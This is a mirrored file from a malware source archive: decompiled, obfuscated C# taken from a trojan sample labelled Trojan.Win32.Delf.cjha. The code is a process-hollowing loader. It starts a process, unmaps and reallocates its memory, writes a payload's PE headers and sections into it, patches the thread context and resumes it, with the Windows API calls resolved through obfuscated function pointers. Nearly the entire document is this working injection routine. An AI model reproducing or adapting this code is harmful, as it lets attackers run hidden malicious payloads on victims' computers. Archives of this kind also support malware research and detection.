mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 00:58:52 +00:00
f2ac1ece55
add
310 lines
11 KiB
C#
310 lines
11 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
|
||
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
|
||
|
||
using \u0004;
|
||
using \u0005;
|
||
using System;
|
||
using System.Runtime.InteropServices;
|
||
|
||
namespace \u0004
|
||
{
|
||
internal class \u0003
|
||
{
|
||
public static void \u0003([In] byte[] obj0, [In] string obj1, [In] string obj2)
|
||
{
|
||
\u0003.\u0011 obj3 = new \u0003.\u0011();
|
||
\u0003.\u0014 obj4 = new \u0003.\u0014();
|
||
\u0003.\u0002 structure1 = new \u0003.\u0002();
|
||
\u0003.\u000F structure2 = new \u0003.\u000F();
|
||
\u0003.\u0004 obj5 = new \u0003.\u0004();
|
||
\u0003.\u0003 obj6 = new \u0003.\u0003();
|
||
structure2.\u0001 = (uint) Marshal.SizeOf((object) structure2);
|
||
obj6.\u0001 = 65543U;
|
||
GCHandle gcHandle = GCHandle.Alloc((object) obj0, GCHandleType.Pinned);
|
||
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
|
||
gcHandle.Free();
|
||
\u0003.\u0011 structure3 = (\u0003.\u0011) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0011));
|
||
\u0003.\u0014 structure4 = (\u0003.\u0014) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0001), typeof (\u0003.\u0014));
|
||
if (structure4.\u0001 != 17744U || structure3.\u0001 != (ushort) 23117)
|
||
return;
|
||
\u0003.\u0018 forFunctionPointer1 = (\u0003.\u0018) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u000E()), typeof (\u0003.\u0018));
|
||
\u0003.\u0013 forFunctionPointer2 = (\u0003.\u0013) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u000F()), \u0002.\u0010()), typeof (\u0003.\u0013));
|
||
\u0003.\u0012 forFunctionPointer3 = (\u0003.\u0012) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0011()), typeof (\u0003.\u0012));
|
||
\u0003.\u0007 forFunctionPointer4 = (\u0003.\u0007) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0012()), typeof (\u0003.\u0007));
|
||
\u0003.\u0010 forFunctionPointer5 = (\u0003.\u0010) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0013()), typeof (\u0003.\u0010));
|
||
\u0003.\u0008 forFunctionPointer6 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0014()), typeof (\u0003.\u0008));
|
||
\u0003.\u0016 forFunctionPointer7 = (\u0003.\u0016) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0015()), typeof (\u0003.\u0016));
|
||
int num1 = forFunctionPointer1(obj2, obj1, IntPtr.Zero, IntPtr.Zero, false, \u0003.\u000E.\u000F, IntPtr.Zero, (string) null, ref structure2, ref obj5) ? 1 : 0;
|
||
int num2 = forFunctionPointer2(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007) ? 1 : 0;
|
||
int num3 = forFunctionPointer3(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007, structure4.\u0001.\u0010, \u0003.\u0006.\u0001 | \u0003.\u0006.\u0002, \u0003.\u0005.\u0003) ? 1 : 0;
|
||
int num4 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007, obj0, structure4.\u0001.\u0011, (object) null) ? 1 : 0;
|
||
for (int index1 = 0; index1 < (int) structure4.\u0001.\u0002; ++index1)
|
||
{
|
||
structure1 = (\u0003.\u0002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002));
|
||
byte[] numArray = new byte[(IntPtr) structure1.\u0003];
|
||
for (int index2 = 0; index2 < (int) structure1.\u0003; ++index2)
|
||
numArray[index2] = obj0[(long) structure1.\u0004 + (long) index2];
|
||
int num5 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) (structure4.\u0001.\u0007 + structure1.\u0002), numArray, structure1.\u0003, (object) null) ? 1 : 0;
|
||
}
|
||
int num6 = forFunctionPointer5(obj5.\u0002, ref obj6) ? 1 : 0;
|
||
byte[] bytes = BitConverter.GetBytes(structure4.\u0001.\u0007);
|
||
int num7 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) (obj6.\u0013 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
|
||
obj6.\u0016 = structure4.\u0001.\u0007 + structure4.\u0001.\u0004;
|
||
int num8 = forFunctionPointer6(obj5.\u0002, ref obj6) ? 1 : 0;
|
||
int num9 = (int) forFunctionPointer7(obj5.\u0002);
|
||
}
|
||
|
||
private struct \u0001
|
||
{
|
||
public ushort \u0001;
|
||
public ushort \u0002;
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
public uint \u0003;
|
||
public ushort \u0003;
|
||
public ushort \u0004;
|
||
}
|
||
|
||
private struct \u0002
|
||
{
|
||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
|
||
public byte[] \u0001;
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
public uint \u0003;
|
||
public uint \u0004;
|
||
public uint \u0005;
|
||
public uint \u0006;
|
||
public ushort \u0001;
|
||
public ushort \u0002;
|
||
public uint \u0007;
|
||
}
|
||
|
||
private struct \u0003
|
||
{
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
public uint \u0003;
|
||
public uint \u0004;
|
||
public uint \u0005;
|
||
public uint \u0006;
|
||
public uint \u0007;
|
||
public \u0003.\u0017 \u0001;
|
||
public uint \u0008;
|
||
public uint \u000E;
|
||
public uint \u000F;
|
||
public uint \u0010;
|
||
public uint \u0011;
|
||
public uint \u0012;
|
||
public uint \u0013;
|
||
public uint \u0014;
|
||
public uint \u0015;
|
||
public uint \u0016;
|
||
public uint \u0017;
|
||
public uint \u0018;
|
||
public uint \u0019;
|
||
public uint \u001A;
|
||
public uint \u001B;
|
||
public uint \u001C;
|
||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
||
public byte[] \u0001;
|
||
}
|
||
|
||
private struct \u0004
|
||
{
|
||
public IntPtr \u0001;
|
||
public IntPtr \u0002;
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
}
|
||
|
||
private enum \u0005 : uint
|
||
{
|
||
\u0005 = 1,
|
||
\u0006 = 2,
|
||
\u0007 = 4,
|
||
\u0008 = 8,
|
||
\u0001 = 16, // 0x00000010
|
||
\u0002 = 32, // 0x00000020
|
||
\u0003 = 64, // 0x00000040
|
||
\u0004 = 128, // 0x00000080
|
||
\u000E = 256, // 0x00000100
|
||
\u000F = 512, // 0x00000200
|
||
\u0010 = 1024, // 0x00000400
|
||
}
|
||
|
||
private enum \u0006 : uint
|
||
{
|
||
\u0001 = 4096, // 0x00001000
|
||
\u0002 = 8192, // 0x00002000
|
||
\u0003 = 524288, // 0x00080000
|
||
\u0006 = 1048576, // 0x00100000
|
||
\u0007 = 2097152, // 0x00200000
|
||
\u0005 = 4194304, // 0x00400000
|
||
\u0004 = 536870912, // 0x20000000
|
||
}
|
||
|
||
private delegate bool \u0007([In] IntPtr obj0, [In] IntPtr obj1, [In] byte[] obj2, [In] uint obj3, [In] object obj4);
|
||
|
||
private delegate bool \u0008([In] IntPtr obj0, [In] ref \u0003.\u0003 obj1);
|
||
|
||
private enum \u000E : uint
|
||
{
|
||
\u0012 = 1,
|
||
\u0011 = 2,
|
||
\u000F = 4,
|
||
\u0013 = 8,
|
||
\u0003 = 16, // 0x00000010
|
||
\u0004 = 512, // 0x00000200
|
||
\u0010 = 1024, // 0x00000400
|
||
\u0008 = 2048, // 0x00000800
|
||
\u000E = 4096, // 0x00001000
|
||
\u0015 = 65536, // 0x00010000
|
||
\u0006 = 262144, // 0x00040000
|
||
\u0014 = 524288, // 0x00080000
|
||
\u0001 = 16777216, // 0x01000000
|
||
\u0007 = 33554432, // 0x02000000
|
||
\u0002 = 67108864, // 0x04000000
|
||
\u0005 = 134217728, // 0x08000000
|
||
}
|
||
|
||
private struct \u000F
|
||
{
|
||
public uint \u0001;
|
||
public string \u0001;
|
||
public string \u0002;
|
||
public string \u0003;
|
||
public uint \u0002;
|
||
public uint \u0003;
|
||
public uint \u0004;
|
||
public uint \u0005;
|
||
public uint \u0006;
|
||
public uint \u0007;
|
||
public uint \u0008;
|
||
public uint \u000E;
|
||
public short \u0001;
|
||
public short \u0002;
|
||
public IntPtr \u0001;
|
||
public IntPtr \u0002;
|
||
public IntPtr \u0003;
|
||
public IntPtr \u0004;
|
||
}
|
||
|
||
private delegate bool \u0010([In] IntPtr obj0, [In] ref \u0003.\u0003 obj1);
|
||
|
||
private struct \u0011
|
||
{
|
||
public ushort \u0001;
|
||
public ushort \u0002;
|
||
public ushort \u0003;
|
||
public ushort \u0004;
|
||
public ushort \u0005;
|
||
public ushort \u0006;
|
||
public ushort \u0007;
|
||
public ushort \u0008;
|
||
public ushort \u000E;
|
||
public ushort \u000F;
|
||
public ushort \u0010;
|
||
public ushort \u0011;
|
||
public ushort \u0012;
|
||
public ushort \u0013;
|
||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
||
public ushort[] \u0001;
|
||
public ushort \u0014;
|
||
public ushort \u0015;
|
||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
||
public ushort[] \u0002;
|
||
public int \u0001;
|
||
}
|
||
|
||
private delegate bool \u0012(
|
||
[In] IntPtr obj0,
|
||
[In] IntPtr obj1,
|
||
[In] uint obj2,
|
||
[In] \u0003.\u0006 obj3,
|
||
[In] \u0003.\u0005 obj4);
|
||
|
||
private delegate bool \u0013([In] IntPtr obj0, [In] IntPtr obj1);
|
||
|
||
private struct \u0014
|
||
{
|
||
public uint \u0001;
|
||
public \u0003.\u0001 \u0001;
|
||
public \u0003.\u0019 \u0001;
|
||
}
|
||
|
||
private struct \u0015
|
||
{
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
}
|
||
|
||
private delegate uint \u0016([In] IntPtr obj0);
|
||
|
||
private struct \u0017
|
||
{
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
public uint \u0003;
|
||
public uint \u0004;
|
||
public uint \u0005;
|
||
public uint \u0006;
|
||
public uint \u0007;
|
||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
||
public byte[] \u0001;
|
||
public uint \u0008;
|
||
}
|
||
|
||
private delegate bool \u0018(
|
||
[In] string obj0,
|
||
[In] string obj1,
|
||
[In] IntPtr obj2,
|
||
[In] IntPtr obj3,
|
||
[In] bool obj4,
|
||
[In] \u0003.\u000E obj5,
|
||
[In] IntPtr obj6,
|
||
[In] string obj7,
|
||
[In] ref \u0003.\u000F obj8,
|
||
[In] ref \u0003.\u0004 obj9);
|
||
|
||
private struct \u0019
|
||
{
|
||
public ushort \u0001;
|
||
public byte \u0001;
|
||
public byte \u0002;
|
||
public uint \u0001;
|
||
public uint \u0002;
|
||
public uint \u0003;
|
||
public uint \u0004;
|
||
public uint \u0005;
|
||
public uint \u0006;
|
||
public uint \u0007;
|
||
public uint \u0008;
|
||
public uint \u000E;
|
||
public ushort \u0002;
|
||
public ushort \u0003;
|
||
public ushort \u0004;
|
||
public ushort \u0005;
|
||
public ushort \u0006;
|
||
public ushort \u0007;
|
||
public uint \u000F;
|
||
public uint \u0010;
|
||
public uint \u0011;
|
||
public uint \u0012;
|
||
public ushort \u0008;
|
||
public ushort \u000E;
|
||
public uint \u0013;
|
||
public uint \u0014;
|
||
public uint \u0015;
|
||
public uint \u0016;
|
||
public uint \u0017;
|
||
public uint \u0018;
|
||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
||
public \u0003.\u0015[] \u0001;
|
||
}
|
||
}
|
||
}
|